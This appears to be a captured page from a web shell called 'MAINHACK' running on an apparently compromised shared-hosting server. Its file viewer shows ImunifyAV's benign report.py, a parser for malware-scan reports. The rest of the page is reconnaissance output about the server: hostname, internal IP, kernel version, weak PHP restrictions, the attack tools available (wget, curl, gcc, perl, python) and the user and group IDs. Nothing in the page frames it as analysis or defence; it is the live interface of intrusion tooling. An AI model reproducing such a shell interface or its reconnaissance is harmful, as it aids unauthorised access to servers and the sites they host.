[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: report.py
File is not writable. Editing disabled.
""" This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>. Copyright © 2019 Cloud Linux Software Inc. This software is also available under ImunifyAV commercial license, see <https://www.imunify360.com/legal/eula> """ import base64 import binascii import csv import os from collections import namedtuple from contextlib import suppress from pathlib import Path from time import time from . import AIBOLIT EXTENDED_SUSPICIOUS = "extended-suspicious" SECTIONS = { "p": "php_malware", "j": "js_malware", "s": "suspicious", "v": "vulners", "c": "cloudhash", "es": EXTENDED_SUSPICIOUS, } SUSPICIOUS_SECTIONS = {"vulners", "suspicious", EXTENDED_SUSPICIOUS} AiBolitCSVReport = namedtuple( "AiBolitCSVReport", [ "section", "path", "signature", "ctime", "mtime", "size", "etime", "signature_id", "hash", "signature_name", "sha256", ], ) def parse_report_csv(report_path: Path): with report_path.open(newline="") as report_stream: for raw_row in csv.reader(report_stream, delimiter=","): row = AiBolitCSVReport(*raw_row) try: section = SECTIONS[row.section] except KeyError: continue sig = row.signature_name or "{}.{}".format( section, row.signature_id ) timestamp = ( int(float(row.etime)) if row.section != "v" else int(time()) ) file_name = row.path with suppress(binascii.Error): file_name = base64.b64decode(file_name, validate=True) file_name = os.fsdecode(file_name) yield { "name": AIBOLIT, "file_name": file_name, "signature": sig, "ctime": int(row.ctime), "modification_time": int(row.mtime), "suspicious": section in SUSPICIOUS_SECTIONS, "size": int(row.size or 0), "hash": row.sha256 or row.hash or None, "timestamp": timestamp, "extended_suspicious": section == EXTENDED_SUSPICIOUS, } def parse_report_json(report, base64_path=True): for section in SECTIONS.values(): for hit in report.get(section, []): sig = hit.get("sn") or ".".join([section, str(hit["sigid"])]) # vulners section does not provide timestamp ('et' field) # so current time is used instead. # 'et' - time when the file was scanned timestamp = ( int(float(hit["et"])) if section != "vulners" else int(time()) ) file_name = hit["fn"] if base64_path: with suppress(binascii.Error): file_name = base64.b64decode(file_name, validate=True) file_name = os.fsdecode(file_name) yield { "name": AIBOLIT, "file_name": file_name, "signature": sig, "suspicious": section in SUSPICIOUS_SECTIONS, "size": hit["sz"], "ctime": hit["ct"], "modification_time": hit["mt"], # 'hash' field is still used in 'cloudhash' section "hash": hit.get("sha256", hit.get("hash")), "timestamp": timestamp, "extended_suspicious": section == EXTENDED_SUSPICIOUS, }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 690.17 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A